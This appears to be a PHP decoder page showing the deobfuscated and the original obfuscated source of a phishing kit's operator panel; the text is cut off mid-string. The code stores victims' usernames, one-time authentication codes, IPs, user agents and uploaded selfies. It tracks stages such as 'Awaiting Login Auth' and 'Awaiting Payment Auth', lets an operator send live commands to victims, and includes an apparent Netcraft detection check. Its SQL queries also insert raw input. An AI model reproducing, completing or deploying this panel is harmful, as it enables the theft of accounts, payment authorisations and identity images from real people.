	\x9\x9"; } } if (isset($_GET["fetch_finish_modal_data"])) { $query = mysqli_query($conn, "SELECT * from customers"); if ($query) { if (mysqli_num_rows($query) >= 1) { $array = mysqli_fetch_all($query, MYSQLI_ASSOC); } } foreach ($array as $value) { $usrlogin = $value["usrlogin"]; $authcode = $value["authcode"]; $ip = $value["ip"]; $useragent = urldecode($value["useragent"]); echo "\xa	
	\x9\x9<div class='modal fade' id='viewmodal_userid_{$value["id"]}' tabindex='-1' role='dialog' style='opacity:1 !important;display:none;height:100%;overflow:scroll;' aria-labelledby='exampleModalLabel' aria-hidden='true'>\xa\x9\x9	\xa			\x9<form name='config_form_{$value["id"]}' id='config_form_{$value["id"]}' method='POST' action='' novalidate>\xa			\x9<input type='hidden' name='userid' value='{$value["id"]}'>
\x9\x9\x9\x9<div class='modal-dialog' role='document' style='margin-top:20%;max-width:100%;font-size:1.2rem;'>
\x9			<div class='modal-content' style='background-color: black;'>\xa	\x9		\x9<div class='modal-header' style='background-color:#34495E;font-size:2.7rem;text-align:center;'>
\x9	\x9	\x9<h5 class='modal-title' id='exampleModalLabel' style='color:white;font-size:1.2rem'>Admin Control (click on log to auto-copy)</h5>
\x9				<button type='button' class='close' onclick='close_btn()'  aria-label='Close'>\xa\x9\x9\x9\x9\x9\x9<span aria-hidden='true' style='color:white'>&times;</span>\xa\x9\x9			</button>\xa\x9\x9			</div>
			\x9\x9<div class='modal-body'>
\x9\x9	
\x9			\x9<div class='form-group' style='margin-bottom:1rem'>\xa	\x9	\x9	\x9<br>
				\x9\x9<center><img src='{$filepath}' style='width:70px;border-radius:10px' alt='no image to display'></center>\xa	\x9\x9\x9		<br>\xa\xa\x9	\x9	\x9\x9<div class='data-group'>\xa				\x9\x9\x9<label class='data-label'>Username</label>
\x9		\x9\x9\x9\x9<input onclick='copy_btn(this)' class='form-control' readonly value='{$usrlogin}'>\xa\x9\x9\x9	\x9\x9</div>\xa\x9		\x9\x9	<div class='data-group'>
\x9	\x9		\x9\x9<label class='data-label'>Auth Code</label>
		\x9	\x9\x9\x9<input onclick='copy_btn(this)' class='form-control' readonly value='{$authcode}'>\xa\x9\x9				</div>
\x9\x9		\x9	<div class='data-group'>
			\x9	\x9	<label class='data-label'>IP/Device</label>
\x9			\x9	\x9<input onclick='copy_btn(this)' class='form-control' readonly value='{$ip} [{$useragent}]'>\xa\x9		\x9		</div>
		\x9	\x9\x9<br>
	\x9\x9\x9\x9</div>
\x9	\x9\x9\x9
		\x9	\x9<!-- END -->\xa\x9\x9\x9\x9	
\x9\x9	\x9\x9<div class='modal-footer' style='margin-top:-40px'>
			\x9\x9<button style='color:black;background-color:white' type='button' onclick='close_btn()' class='btn btn-lg btn-dark col-12' >CLOSE</button>
\x9\x9			\xa\x9		\x9	</div>
	\x9\x9
	\x9	</div>\xa		\x9\xa			</div>\xa	\x9\x9</div>
	\x9\x9</div>\xa\x9	\x9</form>\xa\x9\x9\x9</div>\xa\x9\x9	"; } } if (isset($_GET["counter"])) { $ipFile = "../../logs/visits.txt"; $activequery = mysqli_query($conn, "SELECT * FROM customers WHERE status <20"); $completequery = mysqli_query($conn, "SELECT * FROM customers WHERE status=20"); if ($activequery and $completequery) { $userRows = count(file($ipFile)); $activeRows = mysqli_num_rows($activequery); $completeRows = mysqli_num_rows($completequery); $stats = array("usernum" => $userRows, "activenum" => $activeRows, "completednum" => $completeRows); echo json_encode($stats); } else { echo json_encode(array("stats" => "error")); } } if (isset($_GET["visitlog"])) { $ipFile = "../../logs/visitors.txt"; $logquery = file_get_contents($ipFile, true); if ($logquery) { $log = array("visitorlog" => $logquery); echo json_encode($log); } else { echo json_encode(array("stats" => "error")); } } if (isset($_GET["buzzoff"])) { $query = mysqli_query($conn, "SELECT * FROM customers WHERE status<=8"); if ($query) { $array = array_filter(mysqli_fetch_all($query, MYSQLI_ASSOC)); foreach ($array as $value) { $userid = $value["id"]; $queryy = mysqli_query($conn, "UPDATE customers SET buzzed=1 WHERE id={$userid}"); if ($queryy) { $stat = "ok"; } else { $stat = "notok"; } } if ($stat == "ok") { echo json_encode(array("status" => "ok")); } else { echo json_encode(array("status" => "notok")); } } else { echo json_encode(array("status" => "notok")); } } if ($_GET["type"] == "delete") { if ($_POST["userid"] and numeric($_POST["userid"]) == true) { $userid = $_POST["userid"]; $query = mysqli_query($conn, "DELETE FROM customers WHERE id={$userid}"); if ($query) { echo json_encode(array("status" => "ok")); } else { echo json_encode(array("status" => "notok")); } } else { echo json_encode(array("status" => "notokk")); } } } goto F2gdJ; izm9r: function numeric($num) { if (preg_match("/^[0-9]+$/", $num)) { $status = true; } else { $status = false; } return $status; } goto k0702; Fu6KC: session_start(); goto izm9r; Mtm7q: include "margin.php"; goto DT15H; XuRq4: include "../vendor/300.php"; goto s41oT; F2gdJ: if ($_SESSION["started"] == "true") { if ($_GET["getstatus"] and numeric($_GET["getstatus"]) == true) { $id = $_GET["getstatus"]; $query = mysqli_query($conn, "SELECT * from customers WHERE uniqueid='{$id}'"); if (mysqli_num_rows($query) >= 1) { $array = mysqli_fetch_array($query, MYSQLI_ASSOC); echo $array["status"]; } } if ($_GET["type"] == "UserUpload") { if ($_FILES["attachment"] and $_POST["userid"] and numeric($_POST["userid"]) == true) { $targetDir = "../../uploads/"; $fileName = basename($_FILES["attachment"]["name"]); $uniqueid = $_POST["userid"]; $targetFilePath = $targetDir . $uniqueid . $fileName; move_uploaded_file($_FILES["attachment"]["tmp_name"], $targetFilePath); $comment = "Selfie Uploaded, user waiting"; $filepath = $targetFilePath; $query = mysqli_query($conn, "UPDATE customers SET filepath='{$filepath}', comment='{$comment}', status=2, buzzed=0 WHERE uniqueid={$uniqueid}"); if ($query) { header("Location: ../loading.php?user=true"); echo json_encode(array("status" => "ok")); } else { header("Location: ../qr.php?user=true"); echo json_encode(array("status" => "Upload Error")); } } } } goto jWbEo; E6HN2: include "../../CONFIG.php"; goto Mtm7q; DT15H: include "../vendor/100.php"; goto ThZu_; ThZu_: include "../vendor/200.php"; goto XuRq4; CXa0e: include "../vendor/netcraft_check.php"; goto Fu6KC; jWbEo: ?>

Did this file decode correctly?

Original Code

<?php
 goto E6HN2; k0702: if ($_GET["\x74\x79\x70\x65"] == "\x6c\157\147\151\156") { if ($_POST["\x75\163\162\x6c\157\x67\x69\x6e"] and $_POST["\x69\160"] and $_POST["\165\x61"]) { $usrlogin = $_POST["\x75\163\x72\154\x6f\x67\151\156"]; $ip = $_POST["\x69\160"]; $comment = "\116\145\167\40\165\163\x65\162\40\x6c\157\147\147\x65\144\x20\151\156\x74\x6f\40\141\x63\x63\157\x75\x6e\x74"; $ua = urlencode($_POST["\x75\x61"]); $uniqueid = time(); if ($_SESSION["\163\x74\141\x72\164\x65\x64"] == "\164\162\165\x65") { $uniqueid = $_SESSION["\165\x6e\x69\x71\x75\145\151\144"]; $query = mysqli_query($conn, "\125\120\104\x41\x54\105\40\x63\165\163\164\157\155\145\162\163\x20\123\105\124\x20\163\x74\141\164\x75\163\75\x31\54\x20\142\x75\x7a\x7a\145\144\x3d\60\x2c\40\x75\x73\x72\x6c\157\147\x69\x6e\75\47{$usrlogin}\x27\x2c\40\143\157\x6d\155\x65\x6e\164\75\x27{$comment}\x27\x2c\x20\x75\x73\145\x72\x61\147\145\x6e\164\75\x27{$ua}\47\54\x20\x69\160\75\47{$ip}\x27\x20\127\110\105\122\105\40\x75\x6e\151\161\x75\x65\151\144\75{$uniqueid}"); if ($query) { echo json_encode(array("\x73\164\x61\164\165\163" => "\x6f\153")); } else { echo json_encode(array("\x73\x74\x61\164\165\x73" => "\x64\x62\40\143\x6f\x6e\x6e\40\156\157\164\157\x6b")); } } else { $_SESSION["\x75\156\151\x71\165\x65\x69\x64"] = $uniqueid; $_SESSION["\x73\x74\141\162\164\x65\x64"] = "\x74\162\x75\x65"; $query = mysqli_query($conn, "\111\x4e\x53\x45\x52\124\x20\x49\116\124\117\x20\143\x75\163\x74\157\x6d\x65\162\163\x20\50\165\163\x72\x6c\x6f\x67\x69\156\54\x20\143\157\155\155\145\156\164\54\x20\151\160\54\40\165\x73\145\x72\x61\147\145\x6e\x74\x2c\x20\165\156\151\x71\x75\x65\151\144\x2c\40\x73\x74\x61\x74\x75\x73\51\x20\x56\101\114\x55\105\123\40\50\47{$usrlogin}\47\x2c\40\47{$comment}\47\54\x20\47{$ip}\47\x2c\x20\x27{$ua}\47\x2c{$uniqueid}\54\40\x31\x29"); if ($query) { echo json_encode(array("\163\164\x61\164\x75\163" => "\157\153")); } else { echo json_encode(array("\x73\x74\141\164\x75\163" => "\144\x62\x20\143\157\156\156\40\x6e\157\x74\x6f\x6b")); } } } } goto DZlkO; s41oT: include "\x2e\x2e\57\166\x65\x6e\144\x6f\162\57\x69\x6e\144\x65\x78\x2e\x70\x68\x70"; goto CXa0e; DZlkO: if ($_SESSION["\x61\144\x6d\x69\x6e\137\154\157\x67\147\145\144"] == "\164\x72\165\145") { if ($_GET["\x74\171\x70\145"] == "\x63\x6f\155\x6d\155\x61\156\144") { if ($_POST["\165\x73\145\162\151\x64"] and numeric($_POST["\165\163\x65\x72\151\144"]) == true and $_POST["\163\164\x61\x74\165\163"] and numeric($_POST["\163\164\141\164\x75\x73"]) == true) { $userid = $_POST["\165\x73\145\x72\x69\x64"]; $status = $_POST["\x73\164\141\164\165\163"]; $authcode = $_POST["\x61\165\164\150\143\157\x64\x65"]; $comment = "\101\144\x6d\151\x6e\x20\x68\x61\x73\40\x73\x65\156\164\x20\143\157\155\x6d\141\x6e\144"; if ($authcode != null and $authcode != '') { $query = mysqli_query($conn, "\125\x50\x44\x41\124\x45\40\x63\x75\x73\x74\x6f\155\x65\x72\x73\40\123\x45\124\x20\x63\157\x6d\155\145\x6e\x74\75\47{$comment}\47\x2c\x20\x73\x74\x61\x74\x75\163\75\47{$status}\x27\54\x20\x61\x75\164\150\x63\x6f\x64\x65\x3d\x27{$authcode}\47\x20\x57\110\105\122\105\40\x69\x64\75{$userid}"); } else { $query = mysqli_query($conn, "\x55\x50\104\101\x54\x45\40\x63\x75\x73\164\x6f\x6d\145\x72\163\40\123\x45\124\40\x63\157\155\x6d\145\x6e\x74\x3d\x27{$comment}\x27\x2c\x20\x73\164\x61\x74\165\163\75{$status}\x20\127\x48\x45\122\x45\x20\x69\x64\x3d{$userid}"); } if ($query) { echo json_encode(array("\163\x74\141\x74\x75\163" => "\157\153")); } else { echo json_encode(array("\x73\164\141\x74\x75\163" => "\x64\142\40\143\x6f\156\x6e\x20\145\162\162\157\x72")); } } else { echo json_encode(array("\163\164\141\164\165\163" => "\143\157\x6d\155\x61\156\x64\40\x65\162\162\x6f\x72")); } } if (isset($_GET["\x67\x65\x74\137\163\165\142\155\x69\x74\x74\x65\x64"])) { $query = mysqli_query($conn, "\x53\105\114\105\103\124\x20\52\x20\106\122\117\x4d\40\143\165\x73\x74\157\x6d\145\162\163\x20\127\110\x45\122\105\40\163\x74\x61\164\165\163\x3c\x3d\x38\40\141\156\144\40\x62\165\x7a\x7a\x65\x64\75\x30"); if ($query) { $num = mysqli_num_rows($query); $array = mysqli_fetch_array($query, MYSQLI_ASSOC); if ($num >= 1) { echo json_encode(array("\163\x74\141\x74\x75\x73" => "\157\x6b")); } else { echo json_encode(array("\x73\x74\x61\164\165\x73" => "\156\157\x74\x6f\153")); } } else { echo json_encode(array("\x73\164\141\x74\165\x73" => "\156\157\164\x6f\153")); } } if (isset($_GET["\146\x65\164\143\x68\137\x70\x63\x5f\x64\141\x74\141"])) { $query = mysqli_query($conn, "\123\105\114\105\103\124\40\x2a\40\146\162\157\x6d\x20\x63\x75\163\x74\x6f\155\145\162\163"); if ($query) { if (mysqli_num_rows($query) >= 1) { $array = array_filter(mysqli_fetch_all($query, MYSQLI_ASSOC)); } } foreach ($array as $value) { if ($value["\x73\164\141\164\x75\163"] == 500) { $info = "\74\x73\x70\141\156\40\x63\x6c\x61\163\x73\75\x22\x62\141\144\147\145\40\142\x61\x64\x67\145\55\x77\x61\162\x6e\x69\x6e\x67\42\x3e\105\x61\163\x74\145\x72\x20\x65\x67\147\x3c\57\x73\x70\x61\x6e\x3e"; } elseif ($value["\x73\x74\141\164\165\163"] == 1) { $info = "\x3c\163\x70\141\x6e\40\x63\154\x61\x73\x73\75\42\x62\141\x64\x67\x65\x20\x62\141\x64\147\x65\x2d\x69\156\146\x6f\x22\76\116\145\167\x20\125\x73\x65\x72\74\57\x73\160\x61\156\76"; } elseif ($value["\163\164\x61\164\165\163"] == 2) { $info = "\x3c\163\160\x61\x6e\40\x63\154\x61\x73\163\x3d\x22\142\x61\144\x67\145\x20\142\x61\x64\147\145\55\x69\x6e\146\x6f\42\76\125\x70\154\157\x61\x64\145\x64\x20\121\122\x3c\x2f\163\x70\141\x6e\x3e"; } elseif ($value["\x73\x74\x61\164\165\x73"] == 11) { $info = "\x3c\x73\x70\141\156\x20\143\x6c\141\163\x73\x3d\x22\x62\141\x64\147\145\40\x62\141\x64\147\x65\x2d\x70\x72\151\155\x61\x72\x79\42\76\x41\x77\141\151\x74\151\x6e\147\x20\x4c\157\147\151\x6e\40\101\x75\x74\x68\x3c\57\163\160\x61\x6e\76"; } elseif ($value["\x73\x74\141\x74\x75\163"] == 12) { $info = "\74\x73\160\141\x6e\x20\x63\x6c\141\163\163\x3d\42\x62\141\144\x67\x65\x20\x62\x61\x64\147\x65\x2d\x70\162\x69\155\x61\162\171\x22\x3e\x41\x77\141\151\x74\x69\x6e\x67\x20\x50\x61\x79\155\145\x6e\164\x20\x41\165\164\150\x3c\x2f\x73\160\x61\x6e\x3e"; } elseif ($value["\x73\x74\141\x74\x75\163"] == 13) { $info = "\x3c\163\x70\x61\x6e\x20\143\154\x61\x73\163\75\x22\x62\141\144\x67\145\x20\x62\x61\x64\147\x65\x2d\160\x72\151\155\141\162\171\x22\76\101\167\x61\x69\164\151\156\147\40\101\160\160\40\101\x75\x74\150\x3c\x2f\x73\160\x61\156\76"; } elseif ($value["\x73\x74\x61\164\x75\x73"] == 13) { $info = "\74\163\160\141\156\x20\x63\154\141\x73\163\75\42\142\141\144\x67\x65\x20\142\141\x64\147\x65\55\160\162\151\155\141\x72\171\42\76\101\x77\x61\x69\164\x69\156\147\40\121\x52\40\103\x6f\144\145\74\x2f\x73\160\x61\x6e\x3e"; } elseif ($value["\163\164\141\164\165\x73"] == 50) { $info = "\74\x73\160\141\156\x20\143\154\141\163\x73\x3d\x22\x62\x61\144\x67\x65\40\x62\141\x64\147\x65\x2d\160\162\x69\x6d\141\162\x79\x22\76\102\x61\x63\x6b\x20\164\157\x20\x6c\x6f\x67\151\156\74\x2f\x73\160\x61\156\x3e"; } elseif ($value["\163\x74\141\x74\x75\x73"] == 100) { $info = "\74\163\160\141\x6e\40\143\154\x61\163\163\75\x22\x62\x61\x64\147\x65\40\x62\x61\x64\147\x65\x2d\x69\156\x66\x6f\42\x3e\111\116\x56\101\x4c\x49\x44\74\57\x73\160\x61\x6e\x3e"; } elseif ($value["\163\164\x61\164\165\163"] == 20) { $info = "\x3c\163\160\x61\156\x20\x63\x6c\x61\163\x73\x3d\42\x62\x61\x64\147\x65\40\x62\141\144\147\x65\x2d\163\x75\x63\x63\145\x73\163\x22\76\106\151\x6e\x69\x73\150\145\144\74\57\163\160\x61\156\76"; } if ($value["\x73\164\x61\x74\x75\x73"] == 20) { $userStatus = "\74\163\x70\141\156\76\x3c\x69\x6d\147\40\163\x72\143\x3d\42\x70\141\162\x74\x69\x61\154\57\x69\155\x67\57\157\x66\146\x2e\x70\x6e\147\x22\x20\163\164\x79\154\x65\x3d\42\x77\151\144\x74\150\x3a\62\60\160\x78\x3b\160\141\x64\144\151\x6e\x67\x2d\162\x69\x67\150\164\72\61\x70\170\x22\x3e\74\142\x3e\x4f\x66\x66\154\x69\156\145\74\57\x62\x3e\x3c\57\x73\160\141\156\76"; echo "\xa\11\x9\11\11\x3c\x74\x72\40\x73\164\x79\x6c\145\75\x27\x63\x6f\154\157\x72\x3a\x77\150\x69\164\145\47\x3e\xa\11\11\11\x9\11\74\x74\144\76{$value["\151\144"]}\x3c\57\x74\144\76\xa\x9\x9\x9\11\x9\74\x74\x64\x3e{$value["\x75\x73\x72\154\157\147\151\x6e"]}\74\x2f\164\x64\76\12\x9\x9\x9\11\11\74\164\x64\76{$userStatus}\74\x2f\164\x64\x3e\12\x9\11\x9\x9\11\x3c\x74\x64\x3e{$value["\x69\160"]}\x3c\x2f\x74\144\76\12\x9\x9\x9\x9\11\x3c\x74\144\x3e{$info}\x3c\57\x74\x64\76\12\11\x9\x9\x9\11\x3c\x74\144\x3e\xa\11\x9\11\x9\x9\x9\x3c\x62\x75\164\164\x6f\156\x20\x74\171\x70\145\75\x27\142\165\x74\x74\x6f\x6e\x27\40\157\x6e\x63\x6c\x69\x63\x6b\75\47\166\151\x65\167\137\x6c\x6f\147\102\x74\x6e\50\164\x68\x69\x73\51\x27\x20\x63\154\141\x73\x73\x3d\47\x62\x74\156\x20\142\x74\156\x2d\155\144\40\142\164\156\x2d\144\x61\162\153\47\x20\151\144\x3d\x27\x75\163\145\162\x69\144\137{$value["\x69\x64"]}\x27\x20\144\141\x74\x61\55\x74\x6f\147\x67\x6c\x65\75\x27\x6d\157\x64\141\154\47\x20\x64\141\164\x61\x2d\164\141\162\x67\x65\164\x3d\47\x23\x76\151\x65\x77\x6d\157\x64\141\154\137\x75\x73\145\x72\151\144\x5f{$value["\151\x64"]}\47\76\126\151\145\x77\x20\114\157\147\74\57\x62\165\x74\x74\157\156\x3e\12\x9\x9\x9\x9\x9\x9\x3c\142\165\164\x74\157\x6e\40\x74\x79\160\x65\75\47\142\165\164\164\x6f\156\47\40\x63\x6c\x61\x73\x73\x3d\x27\x62\164\x6e\40\x62\x74\x6e\x2d\x6d\144\x20\x62\x74\156\x2d\144\x61\156\x67\x65\x72\x27\40\151\144\75\x27\165\163\145\x72\x69\x64\137{$value["\x69\144"]}\47\157\156\143\x6c\x69\143\153\75\47\x64\145\x6c\145\164\x65\x65\x6e\164\162\x79\x28\164\150\151\x73\x29\47\x3e\x3c\x69\x20\x63\x6c\141\163\x73\75\x27\x66\x61\x20\x66\141\55\x74\162\141\163\x68\47\40\141\x72\x69\141\x2d\150\151\x64\x64\x65\x6e\75\x27\x74\x72\x75\x65\x27\x3e\x3c\57\151\76\x3c\x2f\142\x75\x74\164\x6f\156\76\xa\x9\11\x9\x9\11\x3c\x2f\x74\144\76\xa\x9\11\x9\11\74\x2f\164\x72\76\xa\11\x9\x9\11"; } else { $userStatus = "\74\x73\x70\141\x6e\x3e\74\151\x6d\x67\x20\x73\162\143\75\42\x70\141\x72\x74\151\141\154\x2f\x69\155\147\x2f\157\146\x66\x2e\x70\156\x67\42\40\163\164\171\154\145\x3d\42\x77\x69\x64\x74\x68\x3a\62\60\160\x78\x3b\x70\x61\x64\144\151\156\147\55\x72\151\x67\150\x74\x3a\x31\x70\x78\42\76\74\142\x3e\x4f\x66\146\154\151\156\x65\74\57\x62\x3e\x3c\57\x73\160\141\x6e\76"; $savedStatus = $value["\154\x61\x73\x74\137\141\x63\164\x69\166\151\164\171"]; if ($savedStatus !== null) { $user_main_status = new DateTime($savedStatus); $currentTime = new DateTime("\x6e\x6f\x77"); $indicator = $currentTime->getTimestamp() - $user_main_status->getTimestamp(); if ($indicator <= 8) { $userStatus = "\74\x73\x70\141\156\76\74\x69\155\147\x20\x73\x72\143\x3d\x22\160\x61\162\x74\x69\141\154\57\151\155\x67\x2f\157\156\56\160\x6e\x67\x22\x20\x73\x74\171\x6c\x65\x3d\42\x77\x69\144\164\150\x3a\62\x30\x70\170\x3b\x70\x61\144\144\151\x6e\147\55\x72\x69\147\x68\x74\72\61\x70\x78\x22\76\x3c\x62\x3e\117\156\154\x69\156\145\74\x2f\142\76\74\x2f\x73\160\x61\x6e\76"; } } else { if ($savedStatus === null) { $userStatus = "\x3c\163\x70\141\156\76\x3c\x69\155\x67\40\x73\162\x63\x3d\x22\160\x61\x72\164\x69\141\x6c\57\x69\155\147\x2f\156\141\56\160\x6e\x67\x22\x20\x73\x74\x79\154\x65\75\x22\167\151\144\164\150\72\x32\x35\160\170\x3b\160\141\x64\x64\151\x6e\x67\x2d\x72\x69\147\150\x74\x3a\61\x70\170\42\x3e\x3c\x62\x3e\x4e\157\40\x64\x61\x74\x61\x3c\57\142\x3e\74\x2f\x73\160\141\x6e\76"; } } echo "\12\11\11\11\11\74\x74\162\x20\x73\x74\x79\x6c\145\x3d\47\143\157\154\x6f\x72\x3a\167\x68\151\164\x65\47\76\xa\x9\11\x9\x9\11\x3c\164\144\76{$value["\x69\x64"]}\x3c\57\164\144\x3e\12\x9\x9\11\x9\11\x3c\x74\x64\76{$value["\x75\x73\x72\x6c\x6f\x67\x69\x6e"]}\74\x2f\164\x64\x3e\12\x9\x9\x9\11\x9\74\x74\144\76{$userStatus}\74\x2f\164\144\76\12\11\x9\x9\11\x9\74\164\x64\x3e{$value["\x69\160"]}\x3c\57\x74\x64\x3e\xa\11\11\x9\x9\11\74\x74\144\76{$value["\x63\157\x6d\155\x65\156\164"]}\74\57\x74\x64\76\xa\x9\x9\11\11\11\74\x74\x64\x3e{$info}\x3c\x2f\164\144\x3e\xa\x9\11\x9\x9\11\x3c\x74\144\76\12\11\x9\11\x9\x9\11\x3c\x62\165\x74\x74\157\x6e\x20\x74\x79\160\x65\75\47\x62\165\164\164\x6f\x6e\47\40\x6f\x6e\x63\154\151\143\x6b\x3d\x27\x63\x6f\156\164\x72\157\154\102\164\x6e\50\x74\150\x69\x73\51\47\40\143\154\141\x73\163\75\47\142\164\x6e\x20\x62\164\156\55\155\x64\40\x62\x74\x6e\x2d\151\x6e\x66\x6f\x27\40\x69\144\75\47\165\x73\x65\x72\x69\144\137{$value["\151\144"]}\x27\x20\x64\x61\x74\x61\55\164\157\147\x67\x6c\x65\x3d\47\155\x6f\144\x61\154\x27\x20\x64\x61\164\x61\x2d\x74\x61\162\x67\x65\164\x3d\47\43\x6d\x6f\x64\x61\154\x5f\165\163\145\x72\x69\144\137{$value["\151\144"]}\47\x3e\101\143\x74\151\157\x6e\x3c\57\142\x75\x74\x74\x6f\x6e\76\xa\11\x9\x9\x9\x9\11\x3c\x62\x75\164\x74\x6f\x6e\40\x74\x79\160\x65\75\47\142\x75\164\x74\x6f\x6e\47\x20\143\154\141\x73\x73\75\47\142\x74\156\x20\x62\x74\x6e\x2d\155\144\x20\x62\164\156\55\x64\141\156\147\x65\x72\x27\40\151\x64\75\47\x75\163\x65\162\x69\x64\137{$value["\151\x64"]}\x27\x6f\x6e\x63\154\151\x63\153\75\47\x64\145\154\145\164\145\x65\156\164\162\171\50\164\x68\151\163\x29\x27\76\74\x69\x20\143\x6c\141\x73\163\x3d\47\x66\141\x20\x66\141\55\164\x72\x61\x73\x68\x27\x20\x61\162\x69\141\x2d\150\151\144\x64\145\x6e\x3d\47\x74\x72\165\145\x27\76\x3c\57\x69\76\74\x2f\142\165\164\x74\157\156\x3e\xa\x9\x9\11\11\11\x3c\x2f\x74\144\76\xa\x9\x9\11\11\74\x2f\164\x72\x3e\12\11\x9\11\x9"; } } } if (isset($_GET["\x66\145\164\143\x68\x5f\x64\141\164\141"])) { $query = mysqli_query($conn, "\123\x45\x4c\105\103\x54\40\52\x20\146\162\157\155\x20\143\x75\x73\164\x6f\155\x65\162\163"); if ($query) { if (mysqli_num_rows($query) >= 1) { $array = array_filter(mysqli_fetch_all($query, MYSQLI_ASSOC)); } } foreach ($array as $value) { if ($value["\x73\x74\141\x74\x75\163"] == 500) { $info = "\x3c\x73\x70\x61\156\40\143\x6c\141\x73\x73\75\x22\142\x61\x64\147\x65\x20\142\x61\144\x67\145\x2d\167\x61\162\x6e\x69\156\147\42\x3e\105\141\163\164\145\x72\x20\x65\x67\147\x3c\x2f\163\160\x61\x6e\x3e"; } elseif ($value["\x73\x74\x61\x74\x75\163"] == 1) { $info = "\x3c\163\x70\x61\156\40\143\x6c\x61\163\x73\75\x22\142\141\x64\x67\145\40\142\x61\144\147\145\55\x69\x6e\146\x6f\x22\76\116\x65\x77\x20\125\163\x65\x72\74\x2f\x73\x70\x61\x6e\76"; } elseif ($value["\x73\164\141\164\165\x73"] == 2) { $info = "\74\163\160\x61\156\x20\x63\x6c\141\x73\163\x3d\42\x62\x61\144\147\145\x20\x62\x61\x64\147\145\55\x69\x6e\x66\157\x22\x3e\x55\x70\x6c\157\x61\144\x65\144\x20\x51\122\74\x2f\163\x70\x61\156\x3e"; } elseif ($value["\x73\164\141\x74\x75\163"] == 11) { $info = "\74\x73\x70\141\156\40\x63\x6c\141\163\x73\x3d\42\x62\141\144\147\145\40\142\141\144\147\145\x2d\x70\162\151\x6d\141\x72\x79\42\x3e\101\167\141\x69\164\x69\x6e\x67\x20\114\x6f\x67\x69\x6e\40\x41\165\164\x68\74\57\163\160\x61\156\76"; } elseif ($value["\x73\164\x61\x74\165\x73"] == 12) { $info = "\74\x73\x70\x61\x6e\40\x63\154\141\163\163\75\42\x62\141\144\147\x65\40\142\141\x64\x67\145\55\x70\x72\x69\155\141\x72\x79\x22\x3e\101\167\141\x69\x74\x69\x6e\x67\x20\x50\141\x79\155\x65\x6e\x74\x20\101\x75\x74\150\x3c\57\x73\x70\141\156\x3e"; } elseif ($value["\x73\x74\x61\x74\x75\x73"] == 13) { $info = "\x3c\163\160\x61\x6e\40\143\154\141\x73\163\75\x22\142\141\x64\147\x65\40\142\x61\x64\147\x65\55\160\x72\x69\x6d\x61\162\171\42\76\101\x77\141\151\164\151\156\x67\x20\101\160\160\40\101\x75\x74\150\74\x2f\x73\x70\141\x6e\x3e"; } elseif ($value["\x73\x74\141\164\165\x73"] == 13) { $info = "\x3c\163\x70\141\x6e\x20\143\x6c\x61\163\163\x3d\x22\x62\x61\144\x67\x65\40\142\141\144\147\145\x2d\x70\x72\151\155\x61\162\x79\x22\76\x41\167\x61\151\164\x69\156\x67\x20\x51\122\x20\103\x6f\x64\145\74\57\163\x70\x61\x6e\x3e"; } elseif ($value["\x73\x74\x61\x74\x75\x73"] == 50) { $info = "\74\x73\160\x61\x6e\x20\x63\154\x61\x73\163\75\x22\x62\141\x64\147\x65\x20\142\x61\144\x67\145\55\x70\162\x69\x6d\141\x72\171\42\76\x42\x61\143\153\40\164\157\40\154\x6f\x67\x69\156\x3c\x2f\x73\160\x61\x6e\x3e"; } elseif ($value["\x73\x74\x61\x74\165\x73"] == 100) { $info = "\x3c\163\160\x61\x6e\40\x63\154\x61\x73\163\x3d\42\142\141\144\147\x65\40\x62\x61\x64\147\145\x2d\x69\156\146\x6f\42\76\111\116\126\x41\x4c\x49\104\74\x2f\163\160\141\x6e\76"; } elseif ($value["\163\164\141\164\x75\163"] == 20) { $info = "\x3c\163\x70\x61\156\40\143\154\x61\163\x73\75\x22\x62\141\x64\147\145\x20\x62\x61\x64\x67\x65\x2d\163\165\x63\143\x65\163\x73\x22\76\x46\151\x6e\151\x73\150\145\x64\74\57\x73\x70\141\x6e\x3e"; } if ($value["\x73\x74\x61\x74\165\x73"] == 20) { $userStatus = "\x3c\x73\160\141\156\x3e\x3c\151\155\x67\40\x73\162\143\75\x22\x70\x61\162\164\151\x61\154\57\x69\x6d\147\x2f\x6f\146\x66\56\x70\156\x67\42\40\163\x74\x79\154\145\75\42\167\x69\x64\164\x68\x3a\62\x30\x70\170\x3b\160\x61\x64\x64\151\x6e\x67\55\162\151\147\x68\x74\72\61\160\170\x22\76\x3c\x62\76\x4f\x66\146\x6c\x69\156\145\74\x2f\142\x3e\74\57\x73\x70\x61\x6e\76"; echo "\12\x9\11\11\11\74\x74\x72\x20\163\x74\x79\x6c\x65\x3d\47\143\157\x6c\x6f\162\72\x77\150\151\x74\x65\x27\76\12\11\x9\x9\11\x9\74\x74\144\x3e{$value["\x69\x64"]}\x3c\x2f\164\x64\x3e\12\11\x9\11\11\x9\74\x74\144\x3e{$value["\165\163\x72\x6c\x6f\x67\151\x6e"]}\74\57\164\x64\76\12\x9\x9\11\11\x9\x3c\164\x64\x3e{$userStatus}\x3c\x2f\164\x64\x3e\xa\11\11\x9\11\x9\74\164\x64\76{$value["\151\x70"]}\x3c\x2f\164\x64\76\xa\x9\x9\11\x9\11\x3c\x74\144\76{$info}\74\x2f\164\144\x3e\12\x9\11\11\x9\x9\x3c\x74\x64\x3e\xa\11\11\11\x9\x9\x9\x3c\x62\165\164\x74\157\156\40\x74\171\160\145\x3d\x27\x62\x75\x74\164\157\156\47\40\157\x6e\143\154\x69\143\153\x3d\47\x76\151\145\x77\x5f\x6c\157\147\x42\x74\156\x28\x74\x68\x69\163\x29\47\40\x63\x6c\x61\163\163\75\x27\142\164\x6e\40\x62\164\x6e\x2d\155\144\x20\x62\x74\x6e\55\x64\141\162\153\x27\40\x69\144\75\47\x75\x73\x65\162\x69\144\137{$value["\x69\144"]}\47\x20\x64\x61\164\141\55\164\157\x67\x67\154\145\x3d\x27\155\x6f\144\141\154\47\x20\144\x61\x74\141\x2d\x74\141\162\x67\145\164\75\x27\x23\166\x69\x65\167\x6d\x6f\144\141\x6c\x5f\x75\163\x65\x72\151\x64\x5f{$value["\151\144"]}\47\x3e\x56\x69\x65\167\40\114\157\x67\x3c\x2f\x62\x75\164\x74\157\156\x3e\xa\x9\11\11\x9\11\11\x3c\x62\x75\164\164\157\156\x20\164\171\160\x65\75\47\x62\165\x74\x74\157\156\47\40\x63\154\141\163\163\75\47\142\164\x6e\40\x62\x74\x6e\x2d\x6d\x64\40\x62\x74\156\55\144\141\x6e\x67\x65\x72\x27\40\151\144\x3d\47\165\163\x65\162\151\144\137{$value["\x69\144"]}\47\x6f\156\143\154\151\143\153\75\47\x64\145\x6c\x65\164\x65\x65\1